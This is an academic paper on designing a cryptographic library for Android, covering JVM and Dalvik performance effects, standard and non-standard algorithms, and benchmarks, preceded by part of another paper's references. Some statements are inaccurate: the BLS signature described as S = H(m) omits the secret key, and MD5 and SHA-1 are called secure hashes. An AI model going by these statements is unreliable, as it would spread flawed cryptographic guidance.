[6] T. Wang, T. Wei, G. Gu, and W. Zou, "TaintScope: A checksum-aware directed fuzzing tool for automatic software vulnerability detection," in Proceedings of the 31st IEEE Symposium on Security and Privacy, Oakland, California, USA, May 2010, pp. 497-512.
[7] L. Cavallaro, P. Saxena, and R. Sekar, "Anti-taint-analysis: Practical evasion techniques against information flow based malware defense," Technical report, Stony Brook University, 2007.
[8] C. Cadar, V. Ganesh, P. Pawlowski, D. Dill, and D. Engler, "EXE: A system for automatically generating inputs of death using symbolic execution," in Proceedings of the ACM Conference on Computer and Communications Security, October 2006, pp. 322-335.
[9] C. Cadar, D. Dunbar, and D. Engler, "KLEE: Unassisted and automatic generation of high-coverage tests for complex systems programs," in Proceedings of the USENIX Symposium on Operating Systems Design and Implementation, 2008, pp. 209-224.
[10] J. Clause, W. Li, and A. Orso, "Dytan: a generic dynamic taint analysis framework," in Proceedings of the International Symposium on Software Testing and Analysis, 2007, pp. 196-206.
[11] H. Yin, D. Song, M. Egele, C. Kruegel, and E. Kirda, "Panorama: Capturing system-wide information flow for malware detection and analysis," in Proceedings of the ACM Conference on Computer and Communications Security, October 2007, pp. 116-127.
[12] W. Xu, E. Bhatkar, and R. Sekar, "Taint-enhanced policy enforcement: A practical approach to defeat a wide range of attacks," in Proceedings of the USENIX Security Symposium, 2006, pp. 121-136.
[13] D. Jang, R. Jhala, S. Lerner, and H. Shacham, "An empirical study of privacy-violating information flows in JavaScript web applications," in Proceedings of the ACM Conference on Computer and Communications Security, 2010, pp. 270-283.
[14] M. G. Kang, S. McCamant, P. Poosankam, and D. Song, "DTA++: Dynamic Taint Analysis with Targeted Control-Flow Propagation," in Proceedings of the Network and Distributed System Security Symposium, February 2011, pp. 205-219.
[15] J. Clause, W. Li, and A. Orso, "Dytan: a generic dynamic taint analysis framework," in Proceedings of the International Symposium on Software Testing and Analysis, 2007, pp. 196-206.
[16] V. Ganesh and D. L. Dill, "A decision procedure for bit-vectors and arrays," in Proceedings of the 19th International Conference on Computer Aided Verification, 2007, pp. 519-531.
Implementation Issues in the Construction of Standard and Non-Standard
Cryptography on Android Devices
Alexandre Melo Braga, Eduardo Moraes de Morais
Centro de Pesquisa e Desenvolvimento em Telecomunicações (Fundação CPqD)
Campinas, São Paulo, Brazil
{ambraga,emorais}@cpqd.com.br
Abstract—This paper describes the design decisions and implementation issues involved in the construction of a cryptographic library for Android devices. Four aspects of the implementation are discussed: the selection of cryptographic primitives, the architecture of components, performance evaluation, and the implementation of non-standard cryptographic algorithms. The motivation behind the special attention given to the selection of alternative cryptographic algorithms is the recently revealed weaknesses found in international encryption standards, which may have been intentionally introduced by foreign intelligence agencies.
Keywords-Cryptography; Surveillance; Security; Android.

I. INTRODUCTION
Currently, the proliferation of smartphones and tablets and the advent of cloud computing are changing the way software is developed and distributed. The use of cryptographic techniques in software systems is increasing as well.
This paper discusses the construction of a cryptographic library for Android devices. It focuses on design decisions as well as on implementation issues of both standard and non-standard algorithms. This work contributes to the state of the practice by discussing the technical aspects and challenges of cryptographic implementations. It is part of an effort to build security technologies into an integrated framework for mobile device security [2]. An evaluation of several cryptographic libraries on Android devices was reported in a previous work [1], showing that there is a lack of sophisticated cryptographic primitives, such as elliptic curves and bilinear pairings. Moreover, the majority of the assessed schemes implement only standard algorithms and, as far as the authors know, there is no practical design that addresses alternative, non-standard cryptography.
The motivation behind the special attention given to the selection of alternative cryptographic algorithms was the recently revealed weaknesses, which may have been intentionally introduced by foreign intelligence agencies into international encryption standards [16][26]. This fact alone raises doubt about all internationally adopted standardized algorithms. In this context, a need arose to treat what has been called "alternative" or "non-standard" cryptography in opposition to standardized cryptographic schemes. The final intent was to strengthen the implementation of advanced cryptography and to foster its use. Non-standard cryptography provides advanced mathematical concepts, such as bilinear pairings and elliptic curves, which are not fully standardized by foreign organizations and undergo constant improvement.
The remaining parts of the text are organized as follows. Section II offers background on cryptographic implementation on Java and Android. Section III details the implementation aspects. Section IV presents a performance evaluation and a comparison with other libraries. Section V concludes this text.

II. BACKGROUND AND RELATED WORK
This section briefly describes the topics of interest: the Java Cryptographic Architecture (JCA) as a framework for pluggable cryptography; the Java Virtual Machine (JVM) with its Garbage Collector (GC) and Just-in-Time (JiT) compilation; and the Dalvik Virtual Machine (DVM) for Android.
A. JCA
The JVM is the runtime software ultimately responsible for the execution of Java programs. In order to be interpreted by the JVM, Java programs are translated to bytecodes, an intermediate representation that is neither source code nor executable code. The JCA [17] is a software framework for the use and development of cryptographic primitives on the Java platform. The JCA defines, among other facilities, Application Program Interfaces (APIs) for digital signatures and secure hash functions [17]. APIs for encryption, key establishment, and message authentication codes (MACs), on the other hand, are defined in the Java Cryptography Extension (JCE) [19]. Since version 1.4, the JCE has been incorporated into the JCA, and the two are treated in practice as a single framework, named JCA or JCE [20].
The benefit of using a software framework such as the JCA is to take advantage of good design decisions by reusing the whole architecture. The API keeps the same general behavior regardless of specific implementations, and the addition of new algorithms is facilitated by the use of a standard API [20].
B. GC on JVM
One architectural feature of the JVM has a great influence on the general performance of applications: the GC [35][37]. Applications have different GC requirements. For some applications, pauses during garbage collection may be tolerable, or simply obscured by network latencies, in such a way that throughput is the important performance metric.
However, in others, even short pauses may negatively affect
the user experience.
One of the most advertised advantages of the JVM is that it
shields the developer from the complexity of memory
allocation and garbage collection. However, when garbage
collection becomes a major bottleneck, it is worth
understanding some aspects of its implementation.
The JVM incorporates a number of different GC
algorithms that are combined using generational collection.
While a simple GC examines every live object in the heap,
generational collection exploits an empirical hypothesis in
order to minimize the work required to reclaim unused
objects. The hypothesis supporting generational GC is
corroborated by the observed behavior of applications,
in which most objects
survive for only a short period of time. Some objects can be
reclaimed soon by memory management, because they have
died shortly after being allocated. For example, iterator
objects are often alive for the duration of a single loop.
On the other hand, some objects do live longer. For
instance, there are typically some objects allocated at
initialization that live until the program terminates. Between
these two extremes are objects that live for the duration of
some intermediate computation. For example, external loop
variables live longer than inner loop variables. Efficient GC
is made possible by focusing on the fact that a majority of
objects die young.
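The allocation pattern behind the generational hypothesis can be illustrated with a small sketch (illustrative only, not code from the paper's library): the per-iteration buffer dies young, while the accumulating list survives.

```java
import java.util.ArrayList;
import java.util.List;

public class GenerationalDemo {
    // Long-lived: allocated once, survives until the program ends.
    static final List<byte[]> longLived = new ArrayList<>();

    public static int churn(int iterations) {
        int sum = 0;
        for (int i = 0; i < iterations; i++) {
            // Short-lived: this buffer becomes garbage at the end of each
            // iteration, exactly the pattern generational GC exploits.
            byte[] temp = new byte[1024];
            temp[0] = (byte) i;
            sum += temp[0] & 0xFF;
        }
        // Only one object per call is promoted to the long-lived set.
        longLived.add(new byte[1024]);
        return sum;
    }
}
```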
Garbage collections are clearly identifiable in timing
diagrams, as shown in Figure 1. The figure shows the time
consumed by the first 500 of 10,000 executions of a pure-Java
implementation of the AES encryption algorithm.
C. JiT Compilation
Another important consideration for the performance of Java
programs is JiT compilation [10][35]. Historically, Java
bytecode used to be fully interpreted by the JVM and
presented serious performance issues. Nowadays, the
technology known as HotSpot uses JiT Compilation not only
to compile Java programs, but also to optimize them, while
they execute. The result of JiTC is an application that has
portions of its bytecode compiled and optimized for the
targeted hardware, while other portions are still interpreted.
It is interesting to note that the JVM has to execute the
code before learning how to optimize it. The very first
moments of an application show relatively poor
performance, since the bytecode is being interpreted,
analyzed for optimizations, and compiled at the same time.
After this short period, the overall performance of the
application improves and the execution tends to stabilize at
an acceptable level of performance. Once again, the period
of optimization and compilation is clearly identified in
diagrams, as is shown in Figure 1.
A feature referred to by Oracle as JVM Ergonomics was
introduced in Java 5.0 with the goal of providing good
performance with little or no tuning of configuration options
for the JVM. Instead of using fixed defaults, JVM ergonomics
automatically selects the GC, heap size, and runtime compiler at
JVM startup. The result of ergonomics is that the choice of a
GC does not matter to most applications. That is, most
applications can perform well under the choices made by
Figure 1. JiT Optimization of an AES execution.
JVM, even in the presence of pauses of modest frequency
and duration.
Unfortunately, massive use of JiT compilation has a
potentially negative side for security. Security controls put
into source code in order to avoid side channels can be
stripped out by JiT optimizations. The JiTC is not able to
capture a programmer's intent that is not explicitly
expressed by Java's constructs. That is exactly the case of
constant-time computations needed to avoid timing attacks.
Security-aware optimizations should be able to preserve
security decisions and not undo protections when
transforming the source code of cryptographic implementations
into machine code. Hence, to achieve higher security against
this kind of attack, the use of JiTC technology is not
recommended, which constitutes a trade-off between security
and performance.
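A minimal sketch of the constant-time idiom in question, for a byte-array comparison (class and method names hypothetical; the JDK's own `MessageDigest.isEqual` follows the same pattern):

```java
public class CtCompare {
    // Early-exit comparison: running time depends on the position of the
    // first mismatching byte, which leaks information through timing.
    public static boolean leakyEquals(byte[] a, byte[] b) {
        if (a.length != b.length) return false;
        for (int i = 0; i < a.length; i++) {
            if (a[i] != b[i]) return false;   // data-dependent branch
        }
        return true;
    }

    // Constant-time comparison: always scans the full array and folds
    // differences with XOR/OR, leaving no data-dependent branch for an
    // optimizer to exploit.
    public static boolean constantTimeEquals(byte[] a, byte[] b) {
        if (a.length != b.length) return false;
        int diff = 0;
        for (int i = 0; i < a.length; i++) {
            diff |= a[i] ^ b[i];
        }
        return diff == 0;
    }
}
```

Note, however, that the paper's caveat applies to exactly this kind of code: nothing in the Java source forbids a JiT from transforming it, which is why such guards cannot be fully trusted under aggressive optimization.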
D. DVM
The DVM [7] is the virtual machine that executes Java
bytecode on Android. The DVM is quite different from the
traditional JVM, so software developers have to be
aware of those differences, and performance measurements
of a platform-independent implementation have to be
taken in both environments.
Compared to the JVM, the DVM is a relatively young
implementation and has not undergone extensive evaluation. In
fact, the first independent evaluation of the DVM was only
recently published [13]. There are three major differences
between the DVM and the JVM. First of all, the DVM is a
register-based machine, while the JVM is stack-based. Second,
the DVM applies trace-based JiTC, while the JVM uses
method-based JiTC. Finally, former DVM implementations use
mark-and-sweep GC, while current JVMs use generational GC.
Also, results from that DVM evaluation [13] suggest that
current implementations of DVM are slower than current
implementations of JVM. Concerning cryptographic
requirements, a remarkable difference between these two
environments is that the source of entropy in DVM is
significantly different from the one found on JVM.
III. DESCRIPTION OF THE IMPLEMENTATION
In order to facilitate the portability of the cryptographic
library for mobile devices, in particular for the Android
platform, the implementation was performed according to
the standard cryptographic API for Java, the JCA, its naming
conventions, and design principles [14][17]-[20].
Once JCA was defined as the architectural framework,
the next design decision was to choose the algorithms
minimally necessary for a workable cryptographic library.
The current version of this implementation is illustrated by
Figure 2 and presents the cryptographic algorithms and
protocols described in the following paragraphs. The figure
shows that frameworks, components, services and
applications are all on top of JCA API. The Cryptographic
Service Provider (CSP) is in the middle, along with
BouncyCastle and Oracle providers. Arithmetic libraries are
at the bottom.
Figure 2 shows the CSP divided into two distinct
cryptographic libraries. The left side contains only
standardized algorithms and comprises a conventional
cryptographic library. The right side features only
non-standard cryptography and constitutes the alternative
library. The following subsections describe these two libraries.
A. Standard Cryptography
This subsection details the implementation choices for
the standard cryptographic library. The motivations behind
this implementation were all characteristics of standardized
algorithms: interoperability, documentation, and testability.
The standard cryptography is packaged as a pure-Java library
according to the JCA specifications.
The programming language chosen for implementation
of this cryptographic library was Java. The block cipher is
the AES algorithm, which was implemented along with three
modes of operation: ECB and CBC [27], as well as the GCM mode
for authenticated encryption [28]. PKCS#5 [3] is the simplest
padding mechanism and was chosen for compatibility with
other CSPs. As the GCM mode for authenticated encryption
only uses AES encryption, the optimization of encryption
received more attention than that of decryption.
Implementation aspects of AES and other cryptographic
algorithms can be found on the literature [15][24][34], in
particular [29].
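Through the JCA, an AES-GCM round trip might look like the following sketch (class name hypothetical; `AES/GCM/NoPadding` is the standard JCA transformation name, though availability depends on the installed providers; the IV is random here only for illustration, and in real use must be unique per key):

```java
import java.security.SecureRandom;
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;

public class AesGcmDemo {
    // Encrypts and then decrypts a message with AES/GCM via the JCA,
    // returning the recovered plaintext.
    public static byte[] roundTrip(byte[] plaintext) throws Exception {
        KeyGenerator kg = KeyGenerator.getInstance("AES");
        kg.init(128);
        SecretKey key = kg.generateKey();

        byte[] iv = new byte[12];          // 96-bit IV, the recommended GCM size
        new SecureRandom().nextBytes(iv);

        Cipher enc = Cipher.getInstance("AES/GCM/NoPadding");
        enc.init(Cipher.ENCRYPT_MODE, key, new GCMParameterSpec(128, iv));
        byte[] ciphertext = enc.doFinal(plaintext);  // ciphertext || 128-bit tag

        Cipher dec = Cipher.getInstance("AES/GCM/NoPadding");
        dec.init(Cipher.DECRYPT_MODE, key, new GCMParameterSpec(128, iv));
        return dec.doFinal(ciphertext);
    }
}
```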
The asymmetric signature algorithm is RSA-PSS, a
Probabilistic Signature Scheme constructed over the RSA
signature algorithm. PSS is considered more secure than
ordinary RSA [23][34]. Asymmetric encryption is provided
by RSA-OAEP [23][34].
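A hedged JCA sketch of an RSA-OAEP round trip (class name hypothetical; the transformation string is the standard SunJCE name; the key size and message are illustrative):

```java
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import javax.crypto.Cipher;

public class RsaOaepDemo {
    // OAEP padding randomizes each encryption, unlike raw RSA.
    public static byte[] roundTrip(byte[] msg) throws Exception {
        KeyPairGenerator kpg = KeyPairGenerator.getInstance("RSA");
        kpg.initialize(2048);
        KeyPair kp = kpg.generateKeyPair();

        Cipher enc = Cipher.getInstance("RSA/ECB/OAEPWithSHA-1AndMGF1Padding");
        enc.init(Cipher.ENCRYPT_MODE, kp.getPublic());
        byte[] ct = enc.doFinal(msg);  // msg must fit within the OAEP limit

        Cipher dec = Cipher.getInstance("RSA/ECB/OAEPWithSHA-1AndMGF1Padding");
        dec.init(Cipher.DECRYPT_MODE, kp.getPrivate());
        return dec.doFinal(ct);
    }
}
```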
Two cryptographically secure hashes were implemented:
SHA-1 [22] and MD5. It is well known by now that MD5 is
considered broken and is not to be used in serious
applications; it is present only for ease of implementation. In
the current version, there is no intended direct use for these two
hashes. Their primary use will be as the underlying hash function
in MACs, digital signatures, and PRNGs. The Message
Authentication Codes chosen were the HMAC [25], with
SHA-1 as the underlying hash function, and the GMAC [28],
which can be directly derived from the GCM mode. The SHA-2
family of secure hashes supplies the need for direct use of
standalone hashes.
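An HMAC computation through the JCA's `Mac` service might look like the following sketch (class name hypothetical; `HmacSHA1` is the standard JCA algorithm name):

```java
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

public class HmacDemo {
    // Computes an HMAC-SHA1 tag (20 bytes) over msg under the given key.
    public static byte[] hmacSha1(byte[] key, byte[] msg) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA1");
        mac.init(new SecretKeySpec(key, "HmacSHA1"));
        return mac.doFinal(msg);
    }
}
```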
The need for a key agreement was fulfilled by the
implementation of Station-to-Station (STS) protocol, which
Figure 2. Cryptographic Service Provider Architecture.
is based upon Authenticated Diffie-Hellman [38], and
provides mutual key authentication and confirmation [4][39].
Finally, the mechanism for Password-Based Encryption
(PBE) is based on the Password-Based Key Derivation
Function 2 (PBKDF2) [3], and provides a simple and secure
way to store keys in encrypted form. In PBE, a key-encryption
key is derived from a password.
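A PBKDF2 key-derivation sketch via the standard `SecretKeyFactory` API (class name hypothetical; the iteration count and derived-key length are illustrative choices, not the paper's parameters):

```java
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;

public class PbkdfDemo {
    // Derives a 128-bit key-encryption key from a password and salt.
    // 10,000 iterations is an illustrative work factor.
    public static byte[] deriveKey(char[] password, byte[] salt) throws Exception {
        PBEKeySpec spec = new PBEKeySpec(password, salt, 10000, 128);
        SecretKeyFactory f = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1");
        return f.generateSecret(spec).getEncoded();
    }
}
```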
B. Non-standard Cryptography
This subsection details the implementation choices for
the alternative cryptographic library. The non-standard
cryptography is a dynamic library written in C and accessible
to Java programs through a Java Native Interface (JNI)
connector, which acts as a bridge to a JCA adapter.
At the time of writing, this alternative library was in
the final steps of its construction. The most advanced
cryptographic protocols currently implemented are based
upon a reference implementation [5] and are listed below.
a) ECDH [8]. The key agreement protocol ECDH is a
variation of the Diffie-Hellman protocol using elliptic
curves as the underlying algebraic structure;
b) ECDSA [21]. This is a DSA-based digital signature
using elliptic curves. ECSS [8] is a variation of ECDSA
that does not require the computation of inverses in the
underlying finite field, obtaining a signature algorithm
with better performance;
c) SOK [8]. This protocol is a key agreement for Identity-Based
Encryption (IBE). Sometimes, it is called
SOKAKA, for SOK Authenticated Key Agreement;
d) BLS [6]. A short digital signature scheme in which,
given a message m, one computes S = H(m), where S is
a point on an elliptic curve and H() is a secure hash;
e) ZSS [11]. Similar to the previous case, it is a more
efficient short signature, because it utilizes fixed-point
multiplication on an elliptic curve rather than
arbitrary-point multiplication;
f) BLAKE [32]. A cryptographic hash function submitted to
the worldwide contest for selecting the new SHA-3
standard; it was ranked among the five finalists;
g) ECIES [8]. This is an asymmetric encryption algorithm
over elliptic curves. This algorithm is non-deterministic
Figure 3. Throughput of implementations.
Figure 4. Performance of AES in pure-Java: average, 9th percentile, and
median of 10,000 iterations.
and can be used as a substitute for RSA-OAEP, with
the benefit of shorter cryptographic keys;
h) ECSTS [8]. Variation of STS protocol using elliptic
curves and ECDH as a replacement for ADH;
i) Salsa20 [9]. This is a family of 256-bit stream ciphers
submitted to the ECRYPT Project (eSTREAM);
j) Serpent [31]. A 128-bit block cipher designed as a
candidate in the contest that chose the AES. Serpent did not
win, but it finished second and enjoys a good
reputation in the cryptographic community.
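The paper's ECDH is implemented in C behind a JNI bridge, but the JCA exposes an analogous `KeyAgreement` service; the following sketch shows the protocol shape (class name hypothetical; provider availability varies, e.g., SunEC ships with JDK 7+):

```java
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.util.Arrays;
import javax.crypto.KeyAgreement;

public class EcdhDemo {
    // Each party combines its own private key with the peer's public key;
    // both sides arrive at the same shared secret.
    public static boolean sharedSecretsMatch() throws Exception {
        KeyPairGenerator kpg = KeyPairGenerator.getInstance("EC");
        kpg.initialize(256);  // 256-bit curve, e.g., secp256r1
        KeyPair alice = kpg.generateKeyPair();
        KeyPair bob = kpg.generateKeyPair();

        KeyAgreement kaA = KeyAgreement.getInstance("ECDH");
        kaA.init(alice.getPrivate());
        kaA.doPhase(bob.getPublic(), true);
        byte[] secretA = kaA.generateSecret();

        KeyAgreement kaB = KeyAgreement.getInstance("ECDH");
        kaB.init(bob.getPrivate());
        kaB.doPhase(alice.getPublic(), true);
        byte[] secretB = kaB.generateSecret();

        return Arrays.equals(secretA, secretB);
    }
}
```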
C. Security decisions for non-standard cryptography
Among the characteristics that were considered in the
choice of alternative cryptographic primitives, side-channel
protection was a prevailing factor and played a distinguished
role in the design of the library. For instance, schemes with
known issues were avoided, while primitives constructed to
resist such attacks are currently being considered for
inclusion in the architecture. Furthermore, constant-time
programming techniques, for example in table-access
operations for AES, are being surveyed in order to become
part of the implementation.
Concerning the mathematical security of non-standard
cryptography, the implementation offers alternatives with
256-bit security for both symmetric and asymmetric
encryption. For instance, Serpent-256 corresponds to the
AES-256 block cipher, while the same security level is
achieved in the asymmetric world using elliptic curves over
521-bit finite fields, which in standard cryptography is only
possible with a 15360-bit RSA key. Thus, at higher security
levels, the performance of non-standard primitives is
significantly better than that of standard algorithms, but an
extensive analysis of this scenario, with concrete timing
comparisons, is left as future work.
A final remark about the use of non-standard
cryptography is that working with advanced cryptographic
techniques that have not been sufficiently analyzed by the
scientific community has its own challenges and risks. There
are occasions when the design of a non-standard
cryptographic library has to be conservative in order to
preserve security.
For instance, a recent advance in mathematics
[12][30] eliminated an entire line of research in
theoretical cryptography. The advance affected elliptic
curve cryptography using a special kind of binary curves
called supersingular curves, but had no effect on bilinear
pairings over prime fields or on encryption over ordinary
(common) binary curves. Thus, these two technologies
remain cryptographically secure. Unfortunately, the
compromised curves were in use and had to be eliminated
from the cryptographic library.
As pairings on prime fields can still be securely used in
cryptographic applications, the implementation was adapted
to that new restricted context. Additionally, ordinary elliptic
curves may still be used for cryptographic purposes,
considering they are not supersingular curves, and the
implementation had to adapt to that fact too.
IV. PERFORMANCE EVALUATION
Performance evaluation of Java programs, whether on the
standard JVM or on DVM/Android, is a challenging task due to
the many sources of interference that can affect measurements.
As discussed in previous sections, GC and JiTC have great
influence over the performance of Java programs. The intent
of performance evaluations presented in this section is to
provide and describe a realistic means to compare
cryptography implementations in Java.
Two measurement approaches have been used for the
evaluation of cryptographic functions implemented in
pure-Java programs. The first one was the measurement of
elapsed time for single cryptographic functions processing a
single block of data. This approach suffers from the
interference of GC and JiTC. The JiTC interference can be
eliminated by discarding all the measurements collected
before code optimization. The GC interference cannot be
completely eliminated, though.
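A minimal sketch of this discard-and-aggregate strategy (names hypothetical): sample each operation with `System.nanoTime()`, drop the warm-up samples taken while the JiT is still optimizing, and report the median, which is robust against occasional GC pauses.

```java
import java.util.Arrays;

public class MicroBench {
    // Times 'op' over 'iterations' runs, discards the first 'discard'
    // samples (JiT warm-up), and returns the median of the rest.
    public static long medianNanos(Runnable op, int iterations, int discard) {
        long[] samples = new long[iterations];
        for (int i = 0; i < iterations; i++) {
            long start = System.nanoTime();
            op.run();
            samples[i] = System.nanoTime() - start;
        }
        long[] kept = Arrays.copyOfRange(samples, discard, iterations);
        Arrays.sort(kept);
        return kept[kept.length / 2];
    }
}
```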
Figure 5. Performance evaluation of non-standard cryptography. Digital signatures: signature generation (top-left) and signature verification (top-right). Key agreement: key pair generation (bottom-left), secret-key generation (bottom-right).
Figure 4 exemplifies the first approach and shows the
comparative performance of AES encryption, in ECB mode,
of a single block of data for two Java CSPs: this paper's CSP
and BouncyCastle (BC) [36]. The measurements were taken
on an LG Nexus 4 with 16 GB of internal storage, 2 GB of
RAM, a 1.5 GHz quad-core processor, and Android 4.3. The
procedure consisted of processing a single block of data in a
loop of 10,000 iterations. AES was set up with three key sizes
(128, 192, and 256 bits) for both encryption and decryption.
In order to inhibit the negative influence of GC and JiTC,
three metrics were taken: the average of all iterations, the 9th
percentile, and the median. None of them is a perfect
metric. However, these measures do offer a realistic
comparison of the CSP and BC, which show similar performance.
The second approach for performance evaluation has to
consider that end users of mobile devices will not tune
their Java VMs with obscure configuration options in order
to achieve maximum performance. On the contrary, they will
almost certainly use default configurations, with minor
changes to the device's settings. Thus, the responsiveness of an
application tends to be more relevant to final users than the
performance of single operations.
The second approach of measurement takes into account
the responsiveness of cryptographic services and considers
the speed with which a large amount of data can be
processed, despite the interference of GC and JiTC. The
amount of work performed per unit of time is called the
throughput of the cryptographic implementation.
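Throughput can then be computed from the total bytes processed and the elapsed wall-clock time, GC and JiT pauses included, which matches the responsiveness a user actually observes (helper name hypothetical):

```java
public class ThroughputBench {
    // Converts a byte count and elapsed time into MB/s. Wall-clock time
    // deliberately includes GC and JiT pauses.
    public static double megabytesPerSecond(long totalBytes, long elapsedNanos) {
        double seconds = elapsedNanos / 1e9;
        return (totalBytes / (1024.0 * 1024.0)) / seconds;
    }
}
```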
Figure 3 shows the throughput of four cryptographic
services implemented by the CSP compared to BC and JCE:
MD5, SHA-1, HMAC, and SHA1PRNG. The measurements
were taken on a Samsung Galaxy S III smartphone
(quad-core 1.4 GHz Cortex-A9 processor, 1 GB of RAM,
and Android 4.1). The procedure consisted of processing an
input file of 20 MB in a loop of 10 iterations. All
cryptographic algorithms were set up with a 128-bit key.
BouncyCastle has a deployment for Android, called
SpongyCastle (SC) [33]. It is interesting to observe that the
three CSPs are quite similar in performance.
The previous paragraphs suggest that the pure-Java
package of the CSP, with standard cryptography only, is quite
competitive in performance when compared to other CSPs,
and its use should not be considered a bottleneck for
applications.
Unfortunately, the case for non-standard cryptography is
not that simple, despite its being implemented in C and not
being subject to GC and JiTC influences. Non-standard
cryptography usually has no standard specifications or safe
reference implementations, nor is it in broad use by other
cryptographic libraries. Because of that, comparisons among
implementations of the same algorithm are barely possible.
On the other hand, it is feasible to compare alternative and
standard cryptography, considering the same type of service.
For the non-standard cryptography implementations,
performance measurements were taken on three smartphones:
(i) a Motorola Atrix with a 1 GHz processor, 1 GB of RAM,
and 16 GB of storage; (ii) a Samsung Galaxy S II with a
1.2 GHz dual-core ARM Cortex-A9 processor, 1 GB of
RAM, and 16 GB of storage; and (iii) a Samsung Galaxy S III
with a 1.4 GHz quad-core Cortex-A9 processor, 1 GB of
RAM, and 16 GB of storage.
Figure 5 shows two types of services: digital signatures
at the top and key agreement (KA) at the bottom. The bar
chart in the top-left quadrant shows the generation of digital
signatures for five algorithms: RSA, ECDSA, ECSS, BLS,
and ZSS (BBS). Traditionally, RSA is the slowest one.
Elliptic curve cryptography, as in ECDSA and ECSS, is
faster. Short signatures, such as BLS and ZSS (BBS), are not
as fast as EC.
The bar chart in the top-right quadrant shows the verification
of digital signatures for the same five algorithms: RSA, ECDSA,
ECSS, BLS, and ZSS (BBS). Traditionally, RSA verification is
the fastest one. Elliptic curve cryptography, as in ECDSA and
ECSS, is not that fast. Short signatures, such as BLS and
ZSS (BBS), are terribly slow, due to the complex arithmetic
involved in bilinear pairing computations. The bottom-left
quadrant contains a bar chart showing key pair generation for
ECDSA, ECSS, BLS, and ZSS (BBS). Again, performance
is slow for BLS and ZSS (BBS) due to the complex arithmetic
involved in bilinear pairings.
The bar chart in the bottom-right quadrant shows operations
for two KA schemes: ECDH and SOK. ECDH is quite fast in
generating parameters (both public and private), as well as in
generating the shared secret, but pairing-based KA
schemes are relatively slow in both operations.
V. CONCLUDING REMARKS
This paper discussed implementation issues in the
construction of a cryptographic library for Android
smartphones. The library consists of both standard
and non-standard cryptographic algorithms. Performance
measurements were taken in order to compare the CSP with
other cryptographic providers. Despite all the difficulties in
obtaining realistic data, experiments have shown that the
standard CSP can be competitive with other implementations.
On the other hand, non-standard cryptography has shown low
performance that may inhibit its use in real-time
applications. However, its value consists in offering secure
alternatives to possibly compromised standards. Future work
will focus on correctness, security (particularly in the context
of side-channel attacks), and performance optimization.
Correctness of implementation in the absence of formal
verification is a primary concern and should be taken
seriously, particularly for non-standard cryptography.
Finally, regarding recent global surveillance disclosures,
non-standard cryptographic primitives can be seen as part of
the usual trade-offs that direct the design of
cryptographically secure applications.
ACKNOWLEDGMENT
The authors acknowledge the financial support given to
this work, under the project "Security Technologies for
Mobile Environments – TSAM", granted by the Fund for
Technological Development of Telecommunications –
FUNTTEL – of the Brazilian Ministry of Communications,
through Agreement Nr. 01.11.0028.00 with the Financier of
Studies and Projects - FINEP / MCTI.
REFERENCES
[1] A. Braga and E. Nascimento, "Portability evaluation of cryptographic libraries on Android smartphones," in Proceedings of the 4th International Conference on Cyberspace Safety and Security (CSS'12), Y. Xiang, J. Lopez, C.-C. J. Kuo, and W. Zhou (Eds.), Springer-Verlag, Berlin, Heidelberg, 2012, pp. 459-469.
[2] A. Braga, "Integrated Technologies for Communication Security on Mobile Devices," in MOBILITY, The Third International Conference on Mobile Services, Resources, and Users, 2013, pp. 47-51.
[3] B. Kaliski, RFC 2898, PKCS #5: Password-Based Cryptography Specification Version 2.0. Available at: http://tools.ietf.org/html/rfc2898.
[4] B. O'Higgins, W. Diffie, L. Strawczynski, and R. do Hoog, "Encryption and ISDN - A Natural Fit," 1987 International Switching Symposium (ISS87), 1987.
[5] D. Aranha and C. Gouvêa, RELIC is an Efficient LIbrary for Cryptography. Available at: http://code.google.com/p/relic-toolkit.
[6] D. Boneh, B. Lynn, and H. Shacham, "Short signatures from the Weil pairing," J. Cryptology, 17(4), Sept. 2004, pp. 297-319; extended abstract in Proceedings of Asiacrypt 2001.
[7] D. Bornstein, Dalvik VM Internals. Available at: http://sites.google.com/site/io/dalvik-vm-internals.
[8] D. Hankerson, S. Vanstone, and A. Menezes, Guide to Elliptic Curve Cryptography, Springer-Verlag New York, Inc., Secaucus, NJ, USA, 2003.
[9] D. J. Bernstein, The Salsa20 family of stream ciphers. Available at: http://cr.yp.to/papers.html#salsafamily.
[10] Ergonomics in the 5.0 Java Virtual Machine. Available at: http://www.oracle.com/technetwork/java/ergo5-140223.html.
[11] F. Zhang, R. Safavi-Naini, and W. Susilo, "An Efficient Signature Scheme from Bilinear Pairings and Its Applications," in F. Bao, R. H. Deng, and J. Zhou (Eds.), Public Key Cryptography, Springer, 2004, pp. 277-290.
[12] G. Anthes, "French team invents faster code-breaking algorithm," Communications of the ACM, vol. 57, no. 1, January 2014, pp. 21-23.
[13] H. Oh, B. Kim, H. Choi, and S. Moon, "Evaluation of Android Dalvik virtual machine," in Proceedings of the 10th International Workshop on Java Technologies for Real-time and Embedded Systems (JTRES '12), ACM, New York, NY, USA, 2012, pp. 115-124.
[14] How to Implement a Provider in the Java Cryptography Architecture. Available at: http://docs.oracle.com/javase/7/docs/technotes/guides/security/crypto/HowToImplAProvider.html.
[15] J. Bos, D. Osvik, and D. Stefan, "Fast Implementations of AES on Various Platforms," 2009. Available at: http://eprint.iacr.org/2009/501.pdf.
[16] J. Menn, "Experts report potential software 'back doors' in U.S. standards." Available at: http://www.reuters.com/article/2014/07/15/usa-nsa-software-idUSL2N0PP2BM20140715?irpc=932.
[17] Java Cryptography Architecture Oracle Providers Documentation for Java Platform Standard Edition 7. Available at: http://docs.oracle.com/javase/7/docs/technotes/guides/security/SunProviders.html.
[18] Java Cryptography Architecture Standard Algorithm Name Documentation for Java Platform Standard Edition 7. Available at: http://docs.oracle.com/javase/7/docs/technotes/guides/security/StandardNames.html.
[19] Java Cryptography Extension Unlimited Strength Jurisdiction Policy Files 7 Download. Available at: http://www.oracle.com/technetwork/pt/java/javase/downloads/jce-7-download-432124.html.
[20] Java™ Cryptography Architecture (JCA) Reference Guide. Available at: http://docs.oracle.com/javase/7/docs/technotes/guides/security/crypto/CryptoSpec.html.
